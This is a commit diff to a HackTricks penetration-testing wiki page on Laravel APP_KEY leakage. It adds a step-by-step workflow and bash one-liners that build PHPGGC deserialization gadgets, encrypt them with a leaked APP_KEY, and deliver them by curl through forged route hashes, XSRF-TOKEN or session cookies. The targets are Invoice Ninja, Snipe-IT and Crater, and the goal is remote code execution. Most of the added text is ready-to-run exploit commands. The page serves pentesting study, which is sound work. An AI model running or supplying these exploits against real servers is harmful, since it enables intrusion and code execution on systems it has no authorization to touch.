Merge pull request #1219 from HackTricks-wiki/update_Laravel__APP_KEY_Leakage_Analysis_20250731_124055

Laravel APP_KEY Leakage Analysis
2025-10-10 18:36:50 +00:00 · 2025-08-05 00:01:43 +02:00 · 2025-08-05 00:01:43 +02:00 · af03f5d540
commit af03f5d540
parent e520845213 a212abd80e
1 changed files with 26 additions and 5 deletions
--- a/src/network-services-pentesting/pentesting-web/laravel.md
+++ b/src/network-services-pentesting/pentesting-web/laravel.md
@ -64,10 +64,30 @@ The script transparently supports both CBC and GCM payloads and re-generates the
 | Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |

 The exploitation workflow is always:
-1. Obtain `APP_KEY` (default examples, Git leak, config/.env leak, or brute-force)
-2. Generate gadget with **PHPGGC**
-3. `laravel_crypto_killer.py encrypt …`
-4. Deliver payload through the vulnerable parameter/cookie → **RCE**
+1. Obtain or brute-force the 32-byte `APP_KEY`.
+2. Build a gadget chain with **PHPGGC** (for example `Laravel/RCE13`, `Laravel/RCE9` or `Laravel/RCE15`).
+3. Encrypt the serialized gadget with **laravel_crypto_killer.py** and the recovered `APP_KEY`.
+4. Deliver the ciphertext to the vulnerable `decrypt()` sink (route parameter, cookie, session …) to trigger **RCE**.
+
+Below are concise one-liners demonstrating the full attack path for each real-world CVE mentioned above:
+
+```bash
+# Invoice Ninja ≤5 – /route/{hash}
+php8.2 phpggc Laravel/RCE13 system id -b -f | \
+  ./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
+  xargs -I% curl "https://victim/route/%"
+
+# Snipe-IT ≤6 – XSRF-TOKEN cookie
+php7.4 phpggc Laravel/RCE9 system id -b | \
+  ./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
+curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
+
+# Crater – cookie-based session
+php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
+./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
+curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
+```
+

 ---

@ -180,7 +200,8 @@ Another deserialization: [https://github.com/ambionics/laravel-exploits](https:/


 ## References
-* [Laravel: APP_KEY leakage analysis](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
 * [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
 * [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
 * [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)